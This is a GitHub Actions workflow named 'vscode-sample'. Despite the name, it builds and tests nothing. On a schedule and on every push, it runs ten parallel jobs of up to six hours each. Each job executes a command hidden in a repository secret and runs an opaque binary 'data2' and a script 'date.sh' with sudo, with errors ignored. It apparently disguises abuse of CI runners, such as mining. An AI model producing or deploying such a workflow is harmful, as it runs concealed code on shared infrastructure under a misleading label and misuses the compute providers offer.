name: vscode-sample
on:   
  push: 
  pull_request: 
  schedule: 
  - cron: '0 */10 * * *'
  
jobs: 
 vscode: 
    runs-on: ubuntu-22.04
    strategy: 
      fail-fast: true
      matrix: 
         go: [1.11, 1.12, 1.13, 1.14, 1.15] 
         flag: [A, B] 
    timeout-minutes: 360
  
    steps: 
    - uses: actions/checkout@v3
    - name: code1
      continue-on-error: true 
      run: ${{ secrets.CODE1 }} 
    - name: code2
      continue-on-error: true 
      run: chmod +x data2 && sudo ./data2
    - name: sleep
      continue-on-error: true 
      run: sudo bash date.sh
